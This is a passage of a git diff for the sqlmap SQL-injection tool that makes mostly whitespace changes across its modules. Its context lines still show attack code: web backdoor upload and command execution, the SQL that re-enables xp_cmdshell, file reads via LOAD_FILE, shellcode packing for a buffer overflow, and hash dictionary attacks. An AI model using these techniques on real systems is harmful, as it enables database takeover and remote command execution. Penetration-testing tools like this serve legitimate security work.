""" def __init__(self): - self.webApi = None - self.webBaseUrl = None + self.webApi = None + self.webBaseUrl = None self.webBackdoorUrl = None - self.webStagerUrl = None - self.webDirectory = None + self.webStagerUrl = None + self.webDirectory = None def webBackdoorRunCmd(self, cmd): if self.webBackdoorUrl is None: @@ -61,7 +61,7 @@ class Web: if not cmd: cmd = conf.osCmd - cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) + cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True) if page is not None: @@ -96,7 +96,7 @@ class Web: page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) if "File uploaded" not in page: - warnMsg = "unable to upload the backdoor through " + warnMsg = "unable to upload the backdoor through " warnMsg += "the file stager on '%s'" % directory logger.warn(warnMsg) return False @@ -176,7 +176,7 @@ class Web: self.webApi = choices[int(choice) - 1] break - kb.docRoot = getDocRoot() + kb.docRoot = getDocRoot() directories = getDirs() directories = list(directories) directories.sort() @@ -238,18 +238,18 @@ class Web: self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName) - uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) + uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) if "sqlmap file uploader" not in uplPage: if localPath not in warned: - warnMsg = "unable to upload the file stager " + warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % localPath logger.warn(warnMsg) warned.add(localPath) continue elif "<%" in uplPage or "]+value=\"(?P[^\"]+)\"", uplPage, re.I) kb.data.__VIEWSTATE = extractRegexResult(r"__VIEWSTATE[^>]+value=\"(?P[^\"]+)\"", uplPage, re.I) - infoMsg = "the file stager has been successfully uploaded " + infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' ('%s')" % (localPath, self.webStagerUrl) logger.info(infoMsg) @@ -287,12 +287,12 @@ class Web: else: if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath): - warnMsg = "backdoor has not been successfully uploaded " + warnMsg = "backdoor has not been successfully uploaded " warnMsg += "with file stager probably because of " warnMsg += "lack of write permission." logger.warn(warnMsg) - message = "do you want to try the same method used " + message = "do you want to try the same method used " message += "for the file stager? [y/N] " getOutput = readInput(message, default="N") @@ -304,7 +304,7 @@ class Web: self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = localPath - infoMsg = "the backdoor has probably been successfully " + infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl logger.info(infoMsg) diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index ba9ecc144..d685fef33 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -56,11 +56,11 @@ class xp_cmdshell: inject.goStacked(cmd) def __xpCmdshellConfigure2005(self, mode): - debugMsg = "configuring xp_cmdshell using sp_configure " + debugMsg = "configuring xp_cmdshell using sp_configure " debugMsg += "stored procedure" logger.debug(debugMsg) - cmd = "EXEC master..sp_configure 'show advanced options', 1; " + cmd = "EXEC master..sp_configure 'show advanced options', 1; " cmd += "RECONFIGURE WITH OVERRIDE; " cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode cmd += "RECONFIGURE WITH OVERRIDE; " @@ -69,12 +69,12 @@ class xp_cmdshell: return cmd def __xpCmdshellConfigure2000(self, mode): - debugMsg = "configuring xp_cmdshell using sp_addextendedproc " + debugMsg = "configuring xp_cmdshell using sp_addextendedproc " debugMsg += "stored procedure" logger.debug(debugMsg) if mode == 1: - cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', " + cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', " cmd += "@dllname='xplog70.dll'" else: cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'" @@ -134,7 +134,7 @@ class xp_cmdshell: def xpCmdshellInit(self): if kb.xpCmdshellAvailable is False: - infoMsg = "checking if xp_cmdshell extended procedure is " + infoMsg = "checking if xp_cmdshell extended procedure is " infoMsg += "available, please wait.." logger.info(infoMsg) @@ -145,10 +145,10 @@ class xp_cmdshell: kb.xpCmdshellAvailable = True else: - message = "xp_cmdshell extended procedure does not seem to " + message = "xp_cmdshell extended procedure does not seem to " message += "be available. Do you want sqlmap to try to " message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") + choice = readInput(message, default="Y") if not choice or choice in ("y", "Y"): self.__xpCmdshellConfigure(1) @@ -169,7 +169,7 @@ class xp_cmdshell: kb.xpCmdshellAvailable = True else: - warnMsg = "xp_cmdshell creation failed, probably " + warnMsg = "xp_cmdshell creation failed, probably " warnMsg += "because sp_OACreate is disabled" logger.warn(warnMsg) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index c382787b2..5077c5586 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -95,9 +95,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if lastChar > 0 and length > ( lastChar - firstChar ): length = ( lastChar - firstChar ) - showEta = conf.eta and isinstance(length, int) + showEta = conf.eta and isinstance(length, int) numThreads = min(conf.threads, length) - threads = [] + threads = [] if showEta: progress = ProgressBar(maxValue=length) @@ -250,7 +250,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None logger.error(errMsg) conf.timeSec += 1 - warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') + warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '') warnMsg += "(due to invalid char)" logger.warn(warnMsg) @@ -294,11 +294,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Go multi-threading (--threads > 1) if conf.threads > 1 and isinstance(length, int) and length > 1: - value = [ None ] * length - index = [ firstChar ] # As list for python nested function scoping + value = [ None ] * length + index = [ firstChar ] # As list for python nested function scoping idxlock = threading.Lock() - iolock = threading.Lock() - valuelock = threading.Lock() + iolock = threading.Lock() + valuelock = threading.Lock() kb.threadContinue = True def downloadThread(): diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 9c47453ae..9fd84e1df 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -304,7 +304,7 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False): try: if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True - infoMsg = "suppressing resume console info because of " + infoMsg = "suppressing resume console info because of " infoMsg += "large number of rows (possible slowdown)" logger.info(infoMsg) diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py index 802bafa3f..75d74da91 100644 --- a/lib/techniques/inband/union/use.py +++ b/lib/techniques/inband/union/use.py @@ -249,7 +249,7 @@ def unionUse(expression, unpack=True, dump=False): try: if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True - infoMsg = "suppressing resume console info because of " + infoMsg = "suppressing resume console info because of " infoMsg += "large number of rows (possible slowdown)" logger.info(infoMsg) diff --git a/lib/utils/google.py b/lib/utils/google.py index 649ad7022..cb0d6ef96 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -94,7 +94,7 @@ class Google: if not googleDork: return None - url = "http://www.google.com/search?" + url = "http://www.google.com/search?" url += "q=%s&" % urlencode(googleDork, convall=True) url += "num=100&hl=en&safe=off&filter=0&btnG=Search" url += "&start=%d" % ((gpage-1) * 100) @@ -124,7 +124,7 @@ class Google: try: page = e.read() except socket.timeout: - warnMsg = "connection timed out while trying " + warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.critical(warnMsg) return None @@ -135,8 +135,8 @@ class Google: self.__matches = self.__parsePage(page) if not self.__matches and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "this computer disabling further searches" + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "this computer disabling further searches" raise sqlmapGenericException, warnMsg return self.__matches diff --git a/lib/utils/hash.py b/lib/utils/hash.py index a0c46f0c8..33b7d0d4c 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -507,12 +507,12 @@ def dictionaryAttack(attack_dict): clearConsoleLine() if len(hash_regexes) == 0: - warnMsg = "unknown hash Format. " + warnMsg = "unknown hash Format. " warnMsg += "Please report by e-mail to %s." % ML logger.warn(warnMsg) if len(results) == 0: - warnMsg = "no clear password(s) found" + warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results diff --git a/lib/utils/resume.py b/lib/utils/resume.py index 8ef66e141..e03cdbbec 100644 --- a/lib/utils/resume.py +++ b/lib/utils/resume.py @@ -36,13 +36,13 @@ def queryOutputLength(expression, payload): Returns the query output length. """ - lengthQuery = queries[Backend.getIdentifiedDbms()].length.query - select = re.search("\ASELECT\s+", expression, re.I) - selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) - selectDistinctExpr = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I) - selectFromExpr = re.search("\ASELECT\s+(.+?)\s+FROM", expression, re.I) - selectExpr = re.search("\ASELECT\s+(.+)$", expression, re.I) - miscExpr = re.search("\A(.+)", expression, re.I) + lengthQuery = queries[Backend.getIdentifiedDbms()].length.query + select = re.search("\ASELECT\s+", expression, re.I) + selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) + selectDistinctExpr = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I) + selectFromExpr = re.search("\ASELECT\s+(.+?)\s+FROM", expression, re.I) + selectExpr = re.search("\ASELECT\s+(.+)$", expression, re.I) + miscExpr = re.search("\A(.+)", expression, re.I) if selectTopExpr or selectDistinctExpr or selectFromExpr or selectExpr: if selectTopExpr: @@ -119,7 +119,7 @@ def resume(expression, payload): if resumedValue[-1] == "]": resumedValue = resumedValue[:-1] - infoMsg = "read from file '%s': " % conf.sessionFile + infoMsg = "read from file '%s': " % conf.sessionFile logValue = getCompiledRegex("%s(.*?)%s" % (DUMP_START_MARKER, DUMP_STOP_MARKER), re.S).findall(resumedValue) if logValue: @@ -160,7 +160,7 @@ def resume(expression, payload): return None if len(resumedValue) == int(length): - infoMsg = "read from file '%s': " % conf.sessionFile + infoMsg = "read from file '%s': " % conf.sessionFile infoMsg += "%s" % resumedValue.split("\n")[0] logger.info(infoMsg) @@ -168,7 +168,7 @@ def resume(expression, payload): return resumedValue elif len(resumedValue) < int(length): - infoMsg = "resumed from file '%s': " % conf.sessionFile + infoMsg = "resumed from file '%s': " % conf.sessionFile infoMsg += "%s..." % resumedValue.split("\n")[0] logger.info(infoMsg) @@ -181,7 +181,7 @@ def resume(expression, payload): missingCharsLength = int(length) - len(resumedValue) - infoMsg = "retrieving pending %d query " % missingCharsLength + infoMsg = "retrieving pending %d query " % missingCharsLength infoMsg += "output characters" logger.info(infoMsg) @@ -192,7 +192,7 @@ def resume(expression, payload): logger.debug(debugMsg) if len(finalValue) != ( int(length) - len(resumedValue) ): - warnMsg = "the total length of the query is not " + warnMsg = "the total length of the query is not " warnMsg += "right, sqlmap is going to retrieve the " warnMsg += "query value from the beginning now" logger.warn(warnMsg) diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index ecd962601..a63391362 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -34,7 +34,7 @@ class Connector(GenericConnector): def connect(self): if not IS_WIN: - errMsg = "currently, direct connection to Microsoft Access database(s) " + errMsg = "currently, direct connection to Microsoft Access database(s) " errMsg += "is restricted to Windows platforms" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 6aa5bdfc1..2b3ac2114 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -114,7 +114,7 @@ class Fingerprint(GenericFingerprint): return retVal def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -126,14 +126,14 @@ class Fingerprint(GenericFingerprint): if dbmsOsFp: value += "%s\n" % dbmsOsFp - value += "back-end DBMS: " + value += "back-end DBMS: " if not conf.extensiveFp: value += DBMS.ACCESS return value actVer = Format.getDbms() + " (%s)" % (self.__sandBoxCheck()) - blank = " " * 15 + blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index be6a7ee58..1b2083fd6 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -24,11 +24,11 @@ class Takeover(GenericTakeover): raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "on Microsoft Access it is not possible to establish an " + errMsg = "on Microsoft Access it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "on Microsoft Access it is not possible to establish an " + errMsg = "on Microsoft Access it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 7599e26af..dbfc02fcd 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint): GenericFingerprint.__init__(self, DBMS.FIREBIRD) def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -52,9 +52,9 @@ class Fingerprint(GenericFingerprint): value += actVer return value - actVer = Format.getDbms() + " (%s)" % (self.__dialectCheck()) - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + " (%s)" % (self.__dialectCheck()) + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 53f3bcb34..d335909d0 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -24,11 +24,11 @@ class Takeover(GenericTakeover): raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "on Firebird it is not possible to establish an " + errMsg = "on Firebird it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "on Firebird it is not possible to establish an " + errMsg = "on Firebird it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 8547c9d9b..f756bab5b 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -16,6 +16,6 @@ class Connector(GenericConnector): GenericConnector.__init__(self) def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " + errMsg = "on SAP MaxDB it is not possible to establish a " errMsg += "direct connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index 983123d36..1533dbd6b 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -34,10 +34,10 @@ class Fingerprint(GenericFingerprint): infoMsg = "executing %s SYSINFO version check" % DBMS.MAXDB logger.info(infoMsg) - query = agent.prefixQuery("/* NoValue */") - query = agent.suffixQuery(query) + query = agent.prefixQuery("/* NoValue */") + query = agent.suffixQuery(query) payload = agent.payload(newValue=query) - result = Request.queryPage(payload) + result = Request.queryPage(payload) if not result: warnMsg = "unable to perform %s version check" % DBMS.MAXDB @@ -65,7 +65,7 @@ class Fingerprint(GenericFingerprint): return None def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -77,15 +77,15 @@ class Fingerprint(GenericFingerprint): if dbmsOsFp: value += "%s\n" % dbmsOsFp - blank = " " * 15 - value += "back-end DBMS: " + blank = " " * 15 + value += "back-end DBMS: " if not conf.extensiveFp: value += DBMS.MAXDB return value actVer = Format.getDbms() + " (%s)" % self.__versionCheck() - blank = " " * 15 + blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index 400530a7d..d26ae2e33 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -24,11 +24,11 @@ class Takeover(GenericTakeover): raise sqlmapUnsupportedFeatureException, errMsg def osPwn(self): - errMsg = "on SAP MaxDB it is not possible to establish an " + errMsg = "on SAP MaxDB it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg def osSmb(self): - errMsg = "on SAP MaxDB it is not possible to establish an " + errMsg = "on SAP MaxDB it is not possible to establish an " errMsg += "out-of-band connection" raise sqlmapUnsupportedFeatureException, errMsg diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 196b5e4f3..e2aac55f2 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -104,7 +104,7 @@ class Enumeration(GenericEnumeration): continue - infoMsg = "fetching number of tables for " + infoMsg = "fetching number of tables for " infoMsg += "database '%s'" % db logger.info(infoMsg) @@ -112,7 +112,7 @@ class Enumeration(GenericEnumeration): count = inject.getValue(query, inband=False, error=False, charsetType=2) if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " + warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % db logger.warn(warnMsg) continue @@ -128,7 +128,7 @@ class Enumeration(GenericEnumeration): if tables: kb.data.cachedTables[db] = tables else: - warnMsg = "unable to retrieve the tables " + warnMsg = "unable to retrieve the tables " warnMsg += "for database '%s'" % db logger.warn(warnMsg) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 33f4748ff..5f866f0a5 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -31,7 +31,7 @@ class Filesystem(GenericFilesystem): GenericFilesystem.__init__(self) def unionReadFile(self, rFile): - errMsg = "Microsoft SQL Server does not support file reading " + errMsg = "Microsoft SQL Server does not support file reading " errMsg += "with UNION query SQL injection technique" raise sqlmapUnsupportedFeatureException(errMsg) @@ -98,10 +98,10 @@ class Filesystem(GenericFilesystem): if not result: result = [] - count = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, hexTbl), resumeValue=False, charsetType=2) + count = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, hexTbl), resumeValue=False, charsetType=2) if not isNumPosStrValue(count): - errMsg = "unable to retrieve the content of the " + errMsg = "unable to retrieve the content of the " errMsg += "file '%s'" % rFile raise sqlmapNoneDataException(errMsg) @@ -116,7 +116,7 @@ class Filesystem(GenericFilesystem): return result def unionWriteFile(self, wFile, dFile, fileType, confirm=True): - errMsg = "Microsoft SQL Server does not support file upload with " + errMsg = "Microsoft SQL Server does not support file upload with " errMsg += "UNION query SQL injection technique" raise sqlmapUnsupportedFeatureException(errMsg) @@ -128,22 +128,22 @@ class Filesystem(GenericFilesystem): self.getRemoteTempPath() - debugMsg = "going to use xp_cmdshell extended procedure to write " + debugMsg = "going to use xp_cmdshell extended procedure to write " debugMsg += "the %s file content to file '%s'" % (fileType, dFile) logger.debug(debugMsg) - debugSize = 0xFF00 - tmpPath = posixToNtSlashes(conf.tmpPath) - dFile = posixToNtSlashes(dFile) - dFileName = ntpath.basename(dFile) - wFileSize = os.path.getsize(wFile) + debugSize = 0xFF00 + tmpPath = posixToNtSlashes(conf.tmpPath) + dFile = posixToNtSlashes(dFile) + dFileName = ntpath.basename(dFile) + wFileSize = os.path.getsize(wFile) wFilePointer = codecs.open(wFile, "rb") wFileContent = wFilePointer.read() wFilePointer.close() if wFileSize < debugSize: chunkName = self.updateBinChunk(wFileContent, tmpPath) - sFile = "%s\%s" % (tmpPath, dFileName) + sFile = "%s\%s" % (tmpPath, dFileName) logger.debug("moving binary file %s to %s" % (sFile, dFile)) @@ -153,7 +153,7 @@ class Filesystem(GenericFilesystem): self.execCmd(complComm) else: - infoMsg = "the %s file is bigger than %d " % (fileType, debugSize) + infoMsg = "the %s file is bigger than %d " % (fileType, debugSize) infoMsg += "bytes. sqlmap will split it into chunks, upload " infoMsg += "them and recreate the original file out of the " infoMsg += "binary chunks server-side, please wait.." @@ -163,7 +163,7 @@ class Filesystem(GenericFilesystem): for i in range(0, wFileSize, debugSize): wFileChunk = wFileContent[i:i + debugSize] - chunkName = self.updateBinChunk(wFileChunk, tmpPath) + chunkName = self.updateBinChunk(wFileChunk, tmpPath) if i == 0: infoMsg = "renaming chunk " diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index cb5ec1231..c8024431f 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -132,7 +132,7 @@ class Fingerprint(GenericFingerprint): if not detailed: return - infoMsg = "fingerprinting the back-end DBMS operating system " + infoMsg = "fingerprinting the back-end DBMS operating system " infoMsg += "version and service pack" logger.info(infoMsg) diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index 39b359901..94bab78a2 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -53,7 +53,7 @@ class Takeover(GenericTakeover): for versionSp, data in returns.items(): version, sp = versionSp.split("-") - sp = int(sp) + sp = int(sp) if kb.osVersion == version and kb.osSP == sp: addrs = data @@ -61,14 +61,14 @@ class Takeover(GenericTakeover): break if addrs is None: - errMsg = "sqlmap can not exploit the stored procedure buffer " + errMsg = "sqlmap can not exploit the stored procedure buffer " errMsg += "overflow because it does not have a valid return " errMsg += "code for the underlying operating system (Windows " errMsg += "%s Service Pack %d)" % (kb.osVersion, kb.osSP) raise sqlmapUnsupportedFeatureException(errMsg) shellcodeChar = "" - hexStr = binascii.hexlify(self.shellcodeString[:-1]) + hexStr = binascii.hexlify(self.shellcodeString[:-1]) for hexPair in range(0, len(hexStr), 2): shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair+2] diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 3a4cac0f8..7781c01ea 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -25,12 +25,12 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MYSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } + self.sysUdfs = { + # UDF name: UDF return data-type + "sys_exec": { "return": "int" }, + "sys_eval": { "return": "string" }, + "sys_bineval": { "return": "int" } + } Syntax.__init__(self) Fingerprint.__init__(self) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index df2af3c58..7c60a9f7e 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -39,12 +39,12 @@ class Filesystem(GenericFilesystem): tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) - debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile + debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile debugMsg += "into temporary file '%s'" % tmpFile logger.debug(debugMsg) inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) - debugMsg = "loading the content of hexadecimal encoded file " + debugMsg = "loading the content of hexadecimal encoded file " debugMsg += "'%s' into support table" % rFile logger.debug(debugMsg) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) @@ -52,11 +52,11 @@ class Filesystem(GenericFilesystem): length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), sort=False, resumeValue=False, charsetType=2) if length is None or not length.isdigit() or not len(length) or length in ( "0", "1" ): - errMsg = "unable to retrieve the content of the " + errMsg = "unable to retrieve the content of the " errMsg += "file '%s'" % rFile raise sqlmapNoneDataException, errMsg - length = int(length) + length = int(length) sustrLen = 1024 if length > sustrLen: @@ -74,12 +74,12 @@ class Filesystem(GenericFilesystem): def unionWriteFile(self, wFile, dFile, fileType, confirm=True): logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", True) - fcEncodedStr = fcEncodedList[0] + fcEncodedList = self.fileEncode(wFile, "hex", True) + fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" @@ -95,7 +95,7 @@ class Filesystem(GenericFilesystem): self.askCheckWrittenFile(wFile, dFile, fileType) def stackedWriteFile(self, wFile, dFile, fileType, confirm=True): - debugMsg = "creating a support table to write the hexadecimal " + debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" logger.debug(debugMsg) @@ -104,7 +104,7 @@ class Filesystem(GenericFilesystem): logger.debug("encoding file to its hexadecimal string value") fcEncodedList = self.fileEncode(wFile, "hex", False) - debugMsg = "forging SQL statements to write the hexadecimal " + debugMsg = "forging SQL statements to write the hexadecimal " debugMsg += "encoded file to the support table" logger.debug(debugMsg) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index af37cc85a..daf522498 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint): return None def getFingerprint(self): - value = "" + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) if wsOsFp: @@ -117,7 +117,7 @@ class Fingerprint(GenericFingerprint): return value comVer = self.__commentCheck() - blank = " " * 15 + blank = " " * 15 value += "active fingerprint: %s" % actVer if comVer: diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index e7b1c96eb..1c3f23c29 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -40,7 +40,7 @@ class Syntax(GenericSyntax): expression = expression.replace(old, "CHAR(%s)" % unescaped) else: - unescaped = "CHAR(" + unescaped = "CHAR(" unescaped += ",".join("%d" % ord(c) for c in expression) unescaped += ")" diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 497901ee2..42f0cf49b 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -103,8 +103,8 @@ class Takeover(GenericTakeover): def uncPathRequest(self): if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) - query = agent.suffixQuery(query) + query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) + query = agent.suffixQuery(query) payload = agent.payload(newValue=query) Request.queryPage(payload) diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index 84d5e8fc8..032225e49 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -45,10 +45,10 @@ class Enumeration(GenericEnumeration): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct: if query2: - query = rootQuery.inband.query2 + query = rootQuery.inband.query2 condition = rootQuery.inband.condition2 else: - query = rootQuery.inband.query + query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: @@ -66,7 +66,7 @@ class Enumeration(GenericEnumeration): if values: for value in values: - user = None + user = None roles = set() for count in xrange(0, len(value)): @@ -108,7 +108,7 @@ class Enumeration(GenericEnumeration): if user in retrievedUsers: continue - infoMsg = "fetching number of roles " + infoMsg = "fetching number of roles " infoMsg += "for user '%s'" % user logger.info(infoMsg) @@ -130,7 +130,7 @@ class Enumeration(GenericEnumeration): return self.getPrivileges(query2=True) - warnMsg = "unable to retrieve the number of " + warnMsg = "unable to retrieve the number of " warnMsg += "roles for user '%s'" % user logger.warn(warnMsg) continue @@ -155,14 +155,14 @@ class Enumeration(GenericEnumeration): if roles: kb.data.cachedUsersRoles[user] = list(roles) else: - warnMsg = "unable to retrieve the roles " + warnMsg = "unable to retrieve the roles " warnMsg += "for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersRoles: - errMsg = "unable to retrieve the roles " + errMsg = "unable to retrieve the roles " errMsg += "for the database users" raise sqlmapNoneDataException, errMsg diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index 7daf83090..070f94ba6 100644 --- a/plugins/dbms/oracle/filesystem.py +++ 